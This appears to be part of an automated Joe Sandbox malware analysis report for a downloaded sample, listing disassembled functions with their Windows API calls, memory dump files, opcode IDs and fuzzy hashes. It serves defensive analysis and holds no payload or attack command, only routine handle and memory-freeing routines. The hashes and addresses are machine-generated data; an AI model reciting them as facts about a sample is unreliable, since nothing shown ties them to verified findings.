                                                                                                            • Opcode ID: 2d2977802c62e82c095ea9cb9c1ea24d9637a8f1d2353b5d19e71e37f4973b15
                                                                                                            • Instruction ID: 6031b241c33695464da57b6770c91b45a138e6ec870d6492a92f46c5d27151b7
                                                                                                            • Opcode Fuzzy Hash: 2d2977802c62e82c095ea9cb9c1ea24d9637a8f1d2353b5d19e71e37f4973b15
                                                                                                            • Instruction Fuzzy Hash: F6211C38604228CFDB65CF58EA88BE977B5BFA8304F1084D8D5CA56240CBB45EC4CF01
                                                                                                            Function 003021E0 Relevance: 6.0, APIs: 4, Instructions: 26synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(00000000,?,0031BE5B), ref: 003021F2
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,0031BE5B), ref: 0030220A
                                                                                                            • CloseHandle.KERNEL32(00000000,?,0031BE5B), ref: 00302217
                                                                                                            • CloseHandle.KERNEL32(00000000,?,0031BE5B), ref: 00302236
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventObjectSingleWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2857295742-0
                                                                                                            • Opcode ID: 39cc40f35f9300ff33c57f772405e52156a2fd5ec77a3544b17ed83c99ebd695
                                                                                                            • Instruction ID: 3fc0a8bf16d55aedca76439c03a57ac52b0ede62637d1670f8bf184f46962ff8
                                                                                                            • Opcode Fuzzy Hash: 39cc40f35f9300ff33c57f772405e52156a2fd5ec77a3544b17ed83c99ebd695
                                                                                                            • Instruction Fuzzy Hash: 05F0D47001B200DBD337ABA8EC5CB5ABBBCA308309F004A19E11D46AF2CB7898C4CF10
                                                                                                            Function 003042B0 Relevance: 6.0, APIs: 4, Instructions: 26synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(00000000,?,0031BE60), ref: 003042C2
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,0031BE60), ref: 003042DA
                                                                                                            • CloseHandle.KERNEL32(00000000,?,0031BE60), ref: 003042E7
                                                                                                            • CloseHandle.KERNEL32(00000000,?,0031BE60), ref: 00304306
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventObjectSingleWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2857295742-0
                                                                                                            • Opcode ID: 041379bdbaa9bb39c0b8ebf3bc719bbc5084334235ab0ddca53563009f61d1d4
                                                                                                            • Instruction ID: ad453047a5045f2da5ce6506688c1974c848480ccad715a69d7e072a386532fb
                                                                                                            • Opcode Fuzzy Hash: 041379bdbaa9bb39c0b8ebf3bc719bbc5084334235ab0ddca53563009f61d1d4
                                                                                                            • Instruction Fuzzy Hash: D8F0B270113200DFD7339BA8ED9CB1ABBBCA748305F004A28F9194A2B2C77898C4CB10
                                                                                                            Function 0032778B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 003239FB: __getptd.LIBCMT ref: 00323A01
                                                                                                              • Part of subcall function 003239FB: __getptd.LIBCMT ref: 00323A11
                                                                                                            • __getptd.LIBCMT ref: 0032779A
                                                                                                              • Part of subcall function 003281BE: __getptd_noexit.LIBCMT ref: 003281C1
                                                                                                              • Part of subcall function 003281BE: __amsg_exit.LIBCMT ref: 003281CE
                                                                                                            • __getptd.LIBCMT ref: 003277A8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                            • String ID: csm
                                                                                                            • API String ID: 803148776-1018135373
                                                                                                            • Opcode ID: f21ed9317b392a23d3a0101c206c60fad0d49fe9fee2f2183ce286149558712d
                                                                                                            • Instruction ID: caa86ed391c88a0fb7bb7ba65bab921f9e26eccdef5880d4e9a25b0ad4c148ff
                                                                                                            • Opcode Fuzzy Hash: f21ed9317b392a23d3a0101c206c60fad0d49fe9fee2f2183ce286149558712d
                                                                                                            • Instruction Fuzzy Hash: 3F018C358093248ECF3B9F68E84A6ADB3B5BF10311F65442EE4419A691CF34AE91CF41
                                                                                                            Function 00319AB6 Relevance: 5.0, APIs: 4, Instructions: 33COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00319C80
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00319C8A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00319C96
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00319CA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeLocal$CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2045616094-0
                                                                                                            • Opcode ID: 4f7efa0b7f7e89081bb2520825c97f7466333616d3e7a96e530343ef81c1e492
                                                                                                            • Instruction ID: 0cb72a3d679a44e4fc260aad1f6689bbafdb38e60a11f79611fedefdbff512b0
                                                                                                            • Opcode Fuzzy Hash: 4f7efa0b7f7e89081bb2520825c97f7466333616d3e7a96e530343ef81c1e492
                                                                                                            • Instruction Fuzzy Hash: BA01B675A10208DFCB25DFE4D98899EBBB9AF49311F504698F90A97710CA359EC0CF50
                                                                                                            Function 00319A80 Relevance: 5.0, APIs: 4, Instructions: 33COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00319C80
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00319C8A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00319C96
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00319CA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeLocal$CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2045616094-0
                                                                                                            • Opcode ID: 3efd7b392f6990f67f28d30b81b345221e3410e6b6a7edb76ef89299d0ba5c28
                                                                                                            • Instruction ID: 0cb72a3d679a44e4fc260aad1f6689bbafdb38e60a11f79611fedefdbff512b0
                                                                                                            • Opcode Fuzzy Hash: 3efd7b392f6990f67f28d30b81b345221e3410e6b6a7edb76ef89299d0ba5c28
                                                                                                            • Instruction Fuzzy Hash: BA01B675A10208DFCB25DFE4D98899EBBB9AF49311F504698F90A97710CA359EC0CF50
                                                                                                            Function 00319AEF Relevance: 5.0, APIs: 4, Instructions: 33COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00319C80
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00319C8A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00319C96
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00319CA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeLocal$CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2045616094-0
                                                                                                            • Opcode ID: cc85010a5e75028783c9b9846030bb2c83eace95682c2cdec2e07871ee80e493
                                                                                                            • Instruction ID: 0cb72a3d679a44e4fc260aad1f6689bbafdb38e60a11f79611fedefdbff512b0
                                                                                                            • Opcode Fuzzy Hash: cc85010a5e75028783c9b9846030bb2c83eace95682c2cdec2e07871ee80e493
                                                                                                            • Instruction Fuzzy Hash: BA01B675A10208DFCB25DFE4D98899EBBB9AF49311F504698F90A97710CA359EC0CF50
                                                                                                            Function 0031B66D Relevance: 5.0, APIs: 4, Instructions: 30COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031B928
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031B93D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031B95D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031B97D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$FreeLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 2513001865-0
                                                                                                            • Opcode ID: b55f5d0e2518992cc42cb05a3185a6f06cdf18857425b133ef561ce6e6c688fe
                                                                                                            • Instruction ID: 161d038ea45b5a40a00d60c81492219e6b57a7a3629cd721a36f3bddce13578a
                                                                                                            • Opcode Fuzzy Hash: b55f5d0e2518992cc42cb05a3185a6f06cdf18857425b133ef561ce6e6c688fe
                                                                                                            • Instruction Fuzzy Hash: 89F0F479500200CBE36BCF64EE8C7AA77BDBB4C305F048119E619562B0C77858C9DF12
                                                                                                            Function 0031B6B7 Relevance: 5.0, APIs: 4, Instructions: 30COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031B928
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031B93D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031B95D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031B97D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$FreeLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 2513001865-0
                                                                                                            • Opcode ID: fc22920881615128450a4ee8d98c3438269342eae8da110d2d30ba1b4ceca74b
                                                                                                            • Instruction ID: 161d038ea45b5a40a00d60c81492219e6b57a7a3629cd721a36f3bddce13578a
                                                                                                            • Opcode Fuzzy Hash: fc22920881615128450a4ee8d98c3438269342eae8da110d2d30ba1b4ceca74b
                                                                                                            • Instruction Fuzzy Hash: 89F0F479500200CBE36BCF64EE8C7AA77BDBB4C305F048119E619562B0C77858C9DF12
                                                                                                            Function 0031B691 Relevance: 5.0, APIs: 4, Instructions: 30COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031B928
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031B93D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031B95D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031B97D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$FreeLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 2513001865-0
                                                                                                            • Opcode ID: 5759ad1838d668018faa53f12a62e60ad99a7daa101e4cd094981103612abe8e
                                                                                                            • Instruction ID: 161d038ea45b5a40a00d60c81492219e6b57a7a3629cd721a36f3bddce13578a
                                                                                                            • Opcode Fuzzy Hash: 5759ad1838d668018faa53f12a62e60ad99a7daa101e4cd094981103612abe8e
                                                                                                            • Instruction Fuzzy Hash: 89F0F479500200CBE36BCF64EE8C7AA77BDBB4C305F048119E619562B0C77858C9DF12
                                                                                                            Function 0031A0A4 Relevance: 5.0, APIs: 4, Instructions: 27COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031A140
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031A14A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031A156
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031A160
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeLocal$CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2045616094-0
                                                                                                            • Opcode ID: 628421b90830164cb4c2f28afad2cb0747298d308d1458e63c7488a3f113ad46
                                                                                                            • Instruction ID: 2c168e1d38495446e8f8a367176770ab171cc92109c14e0c03fba484d34f9d1b
                                                                                                            • Opcode Fuzzy Hash: 628421b90830164cb4c2f28afad2cb0747298d308d1458e63c7488a3f113ad46
                                                                                                            • Instruction Fuzzy Hash: 30F0B7B9A10208DFCB25DFF4DD8899EBB7CAF88311F404658B90A97314CA349980CF20
                                                                                                            Function 00305169 Relevance: 5.0, APIs: 4, Instructions: 25COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056DD
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056F2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305702
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305712
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseFreeHandleLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 836400252-0
                                                                                                            • Opcode ID: 5a9da13ed04661a120f2f202513f8fc72b408daea791d3ea414f668e6f6603bd
                                                                                                            • Instruction ID: 55cd445d3a6a616cc6212dbd48454d31576dcd12746d2687e904695055bfc648
                                                                                                            • Opcode Fuzzy Hash: 5a9da13ed04661a120f2f202513f8fc72b408daea791d3ea414f668e6f6603bd
                                                                                                            • Instruction Fuzzy Hash: 25F01235522504DBC737CB58EC5CB6A7BBDBB48301F44652CE105965E0C77989C0DF50
                                                                                                            Function 003053E7 Relevance: 5.0, APIs: 4, Instructions: 25COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056DD
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056F2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305702
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305712
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseFreeHandleLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 836400252-0
                                                                                                            • Opcode ID: 9c963797796627fbeb9d2c2913dcb7a97871e6763f8215083c46f0b4621c0e78
                                                                                                            • Instruction ID: 55cd445d3a6a616cc6212dbd48454d31576dcd12746d2687e904695055bfc648
                                                                                                            • Opcode Fuzzy Hash: 9c963797796627fbeb9d2c2913dcb7a97871e6763f8215083c46f0b4621c0e78
                                                                                                            • Instruction Fuzzy Hash: 25F01235522504DBC737CB58EC5CB6A7BBDBB48301F44652CE105965E0C77989C0DF50
                                                                                                            Function 003053CA Relevance: 5.0, APIs: 4, Instructions: 25COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056DD
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003056F2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305702
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00305712
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
